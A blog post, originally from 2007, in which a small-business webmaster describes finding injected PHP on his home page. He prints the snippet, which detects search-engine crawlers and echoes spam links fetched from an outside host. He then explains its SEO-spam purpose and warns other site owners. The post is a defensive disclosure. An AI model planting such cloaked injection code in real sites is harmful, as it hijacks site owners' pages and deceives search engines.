Subscribe to Small Business Support NetworkSBSN RSS Feed


New Web Site Hack!


I just "discovered" someone had embedded some PHP code on the home page of one of my web sites which redirected search engine robots to a page full of "links".

I'm not quite sure "how" it got inserted onto the bottom of this home page, but its intent is fairly obvious.

This little piece of php scripting:

$HTTP_USER_AGENT=$_SERVER["HTTP_USER_AGENT"];

if (strstr($HTTP_USER_AGENT,"Googlebot") or

strstr($HTTP_USER_AGENT,"msnbot") or

strstr($HTTP_USER_AGENT,"Slurp") or

strstr($HTTP_USER_AGENT,"Yahoo") or

strstr($HTTP_USER_AGENT,"ZyBorg") or

strstr($HTTP_USER_AGENT,"Jeeves")){

$strget=file_get_contents("http://srv1.searchingwww.net/allrandom.php");

echo $strget;

is designed to "grab" search engine robots and redirect them to the URL at http://srv1.searchingwww.net/allrandom.php

So what happens when they get there?

Well if you were to look yourself, you'd see nothing unless you look at the actual HTML coding... And then you'd see a whole list of randomly generated URLs which point to keyword spam sites organised by these filthy people.

URLs to sites that capitalise on Adsense clicks and other affiliate programs that these slime are members of!

These URLs are hidden in a 1x1 pixel marquee which looks like this (I've actually substituted my OWN URLs here to get some linking benefit from it!)




small businessaustralian domain namesaussie web directorypositions vacant

The main purpose of such an exploit seems to be to:

  • get search engines to go to these dubious links from your page, and
  • possibly transfer some of your page rank to these spam sites.

Fortunately, this hack had no effect on my site - because my page wasn't in PHP, the robots would not have been able to follow the link in the script

But...

There are several reasons why you should be worried about such an exploit!

  1. someone has hacked into your home page in the first place. It wasn't something you would even notice unless you actually examined your HTML code.

  2. your site might be penalised or even banned by search engines for associating with "bad neighbourhoods" - i.e. pointing to these keyword spam sites.

  3. a variation of this type of script could have resulted in your site being the source of an uninvited spyware download into your visitor's computer.

So now there's something else you have to look out for!

Regards
Stephen Spry
SBSN Webmaster

Author Credits ::

This item was originally published in 2007... but this is STILL very much a common problem today!